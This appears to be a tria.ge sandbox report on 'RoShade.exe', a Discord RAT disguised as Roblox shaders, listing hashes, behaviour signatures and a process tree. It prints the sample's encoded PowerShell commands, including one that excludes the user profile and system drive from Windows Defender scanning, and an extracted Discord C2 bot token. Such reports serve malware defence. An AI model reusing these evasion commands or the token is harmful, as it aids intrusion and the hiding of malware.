Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    37s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231020-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/11/2023, 18:11

Errors

Reason
Machine shutdown

General

  • Target

    RoShade.exe

  • Size

    88KB

  • MD5

    7e775f593680509571a0500e5de66e05

  • SHA1

    c2b350ec2d335558682c1ac16ec3e2651f558440

  • SHA256

    9a867491752572d0242e09303705fc0cc8c6beffb3bb0557691e3f1d7732ef8d

  • SHA512

    2393bde62b580a434aa058aee813101ccc25a18562777d1cefeaf06dea4b3deb47a537ee6c9b60401739475a734e50fd61147de0f556a7fe14ede06114e1cda7

  • SSDEEP

    1536:JSMJ6+QqmQL4Cxc2pkcDJGIUOO+RNEyZE0GxSDDSeSnuxBMctdRbl:J1M+QqZEYucEKO30GkueSMBMO

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTE3MTQ3NDQ4NTE5NTU5MTgwMQ.G1uOMO.BdWbEh6r9O9EOIKSg-_9Xtb5_Y8XWzQ2TY7QWM

  • server_id

    1172664614979383457

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies data under HKEY_USERS 15 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RoShade.exe
    "C:\Users\Admin\AppData\Local\Temp\RoShade.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAeQBjACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AaQB3ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgBvAGIAbABvAHgAIABTAGgAYQBkAGUAcgBzACAAQwByAGEAcwBoAGUAZAAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAbABuAGMAIwA+AA=="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAegBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAagBkACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAcABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAcgBnACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2924
    • C:\Users\Admin\AppData\Local\Temp\RobloxShaders.exe
      "C:\Users\Admin\AppData\Local\Temp\RobloxShaders.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4116
      • C:\Windows\System32\shutdown.exe
        "C:\Windows\System32\shutdown.exe" /s /t 0
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4724
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa39b3055 /state1:0x41c64e6d
    1⤵
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:4512

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    1KB

    MD5

    4cc9e7069534f7bcbb90ad7cac69ed78

    SHA1

    a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

    SHA256

    4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

    SHA512

    e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    e2c568f2b2424e87edf90b6f913c12e6

    SHA1

    931460dbf2e207bb9fc3d639fc886dec3c454f1e

    SHA256

    8905895a1a08a68850fe68c38d96588f6dc2f5e051ec4339f85c347074138bf7

    SHA512

    be93392ccbed3b9cc256e6e122cf27bc1c1905796911ba9314788f7ee3c444b1bb0fb84f92510efcb43670c650d7ed36ad6477acfbb4049b2dcf1eb0e5fd7a9b

  • C:\Users\Admin\AppData\Local\Temp\RobloxShaders.exe

    Filesize

    78KB

    MD5

    85f694e00f4de6d76314c6ce2ec2009c

    SHA1

    1d1c9f9d2d102cbc622190faa78ca3a1088dfb40

    SHA256

    4a86b1fb5066ef81e652fb2e9534143e9e2eaf29731e8b0a08f0ffd6c7aa885a

    SHA512

    963a5c6d1ed430de29e0805c94c32b2a8f693bbd879c01586120b7ef3cdae82a68306905bb05a8359f3cb0c98a8c5b4a914112e1d16c592b56e029799f1e81d9

  • C:\Users\Admin\AppData\Local\Temp\RobloxShaders.exe

    Filesize

    78KB

    MD5

    85f694e00f4de6d76314c6ce2ec2009c

    SHA1

    1d1c9f9d2d102cbc622190faa78ca3a1088dfb40

    SHA256

    4a86b1fb5066ef81e652fb2e9534143e9e2eaf29731e8b0a08f0ffd6c7aa885a

    SHA512

    963a5c6d1ed430de29e0805c94c32b2a8f693bbd879c01586120b7ef3cdae82a68306905bb05a8359f3cb0c98a8c5b4a914112e1d16c592b56e029799f1e81d9

  • C:\Users\Admin\AppData\Local\Temp\RobloxShaders.exe

    Filesize

    78KB

    MD5

    85f694e00f4de6d76314c6ce2ec2009c

    SHA1

    1d1c9f9d2d102cbc622190faa78ca3a1088dfb40

    SHA256

    4a86b1fb5066ef81e652fb2e9534143e9e2eaf29731e8b0a08f0ffd6c7aa885a

    SHA512

    963a5c6d1ed430de29e0805c94c32b2a8f693bbd879c01586120b7ef3cdae82a68306905bb05a8359f3cb0c98a8c5b4a914112e1d16c592b56e029799f1e81d9

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gedlm2gp.hy1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2924-73-0x0000000007320000-0x0000000007331000-memory.dmp

    Filesize

    68KB

  • memory/2924-76-0x0000000007370000-0x0000000007384000-memory.dmp

    Filesize

    80KB

  • memory/2924-84-0x0000000073D00000-0x00000000744B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2924-78-0x00000000073A0000-0x00000000073A8000-memory.dmp

    Filesize

    32KB

  • memory/2924-77-0x0000000007450000-0x000000000746A000-memory.dmp

    Filesize

    104KB

  • memory/2924-20-0x00000000028E0000-0x00000000028F0000-memory.dmp

    Filesize

    64KB

  • memory/2924-19-0x00000000028E0000-0x00000000028F0000-memory.dmp

    Filesize

    64KB

  • memory/2924-15-0x0000000004F60000-0x0000000005588000-memory.dmp

    Filesize

    6.2MB

  • memory/2924-22-0x0000000073D00000-0x00000000744B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2924-24-0x0000000005700000-0x0000000005766000-memory.dmp

    Filesize

    408KB

  • memory/2924-75-0x0000000007360000-0x000000000736E000-memory.dmp

    Filesize

    56KB

  • memory/2924-71-0x00000000073B0000-0x0000000007446000-memory.dmp

    Filesize

    600KB

  • memory/2924-68-0x0000000007190000-0x000000000719A000-memory.dmp

    Filesize

    40KB

  • memory/2924-65-0x0000000006FD0000-0x0000000007073000-memory.dmp

    Filesize

    652KB

  • memory/2924-45-0x0000000005850000-0x0000000005BA4000-memory.dmp

    Filesize

    3.3MB

  • memory/2924-64-0x0000000006330000-0x000000000634E000-memory.dmp

    Filesize

    120KB

  • memory/2924-53-0x0000000006350000-0x0000000006382000-memory.dmp

    Filesize

    200KB

  • memory/2924-48-0x00000000028E0000-0x00000000028F0000-memory.dmp

    Filesize

    64KB

  • memory/2924-54-0x00000000752F0000-0x000000007533C000-memory.dmp

    Filesize

    304KB

  • memory/2924-52-0x000000007F2C0000-0x000000007F2D0000-memory.dmp

    Filesize

    64KB

  • memory/2964-66-0x00000000087F0000-0x0000000008D94000-memory.dmp

    Filesize

    5.6MB

  • memory/2964-51-0x0000000006A40000-0x0000000006A5A000-memory.dmp

    Filesize

    104KB

  • memory/2964-49-0x00000000051D0000-0x00000000051E0000-memory.dmp

    Filesize

    64KB

  • memory/2964-47-0x0000000006560000-0x00000000065AC000-memory.dmp

    Filesize

    304KB

  • memory/2964-46-0x0000000006520000-0x000000000653E000-memory.dmp

    Filesize

    120KB

  • memory/2964-16-0x0000000073D00000-0x00000000744B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2964-25-0x0000000005EB0000-0x0000000005F16000-memory.dmp

    Filesize

    408KB

  • memory/2964-18-0x00000000051D0000-0x00000000051E0000-memory.dmp

    Filesize

    64KB

  • memory/2964-50-0x0000000007BC0000-0x000000000823A000-memory.dmp

    Filesize

    6.5MB

  • memory/2964-72-0x0000000073D00000-0x00000000744B0000-memory.dmp

    Filesize

    7.7MB

  • memory/2964-21-0x00000000051D0000-0x00000000051E0000-memory.dmp

    Filesize

    64KB

  • memory/2964-13-0x0000000002F40000-0x0000000002F76000-memory.dmp

    Filesize

    216KB

  • memory/2964-67-0x0000000007920000-0x00000000079B2000-memory.dmp

    Filesize

    584KB

  • memory/2964-23-0x0000000005560000-0x0000000005582000-memory.dmp

    Filesize

    136KB

  • memory/4116-74-0x00000263C2830000-0x00000263C28A6000-memory.dmp

    Filesize

    472KB

  • memory/4116-14-0x00007FFFEB500000-0x00007FFFEBFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4116-17-0x00000263C24C0000-0x00000263C24D0000-memory.dmp

    Filesize

    64KB

  • memory/4116-79-0x00000263A82D0000-0x00000263A82E2000-memory.dmp

    Filesize

    72KB

  • memory/4116-80-0x00000263A9C20000-0x00000263A9C3E000-memory.dmp

    Filesize

    120KB

  • memory/4116-44-0x00000263C2CE0000-0x00000263C3208000-memory.dmp

    Filesize

    5.2MB

  • memory/4116-12-0x00000263C24E0000-0x00000263C26A2000-memory.dmp

    Filesize

    1.8MB

  • memory/4116-11-0x00000263A7E80000-0x00000263A7E98000-memory.dmp

    Filesize

    96KB

  • memory/4116-85-0x00007FFFEB500000-0x00007FFFEBFC1000-memory.dmp

    Filesize

    10.8MB

  • memory/4116-86-0x00000263C24C0000-0x00000263C24D0000-memory.dmp

    Filesize

    64KB

  • memory/4116-87-0x00007FFFEB500000-0x00007FFFEBFC1000-memory.dmp

    Filesize

    10.8MB